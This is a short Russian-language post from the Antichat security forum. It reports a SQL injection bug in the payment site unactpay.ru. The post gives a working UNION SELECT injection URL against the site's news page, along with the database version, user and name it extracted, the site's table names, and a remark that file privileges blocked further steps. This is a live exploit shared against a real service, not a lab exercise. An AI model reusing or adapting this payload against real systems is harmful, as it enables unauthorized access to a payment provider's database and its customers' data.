ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Бага в юнекте (кто в танке - вот идешь ты пополнять баланс, а тут юнект...). Нашел Ув. Товарищ Dj_Bes и выложил в болталке за что очень несправедливо получил кучу брани в свой адрес. Инъекцию выкладывал не разработанную, я довел ее до ума, вот результаты:
5.0.40-log;unactpay@pechkin;unactpay_db
http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12, 13+from+INFORMATION_SCHEMA.tables+LIMIT+1,1/*
таблицы походу такие:
file
menu
news
offices
order_rent
page
partners
provider
terminal
terminal_category
terminal_type
filepriv не позволяет проводить операции с файлами =\.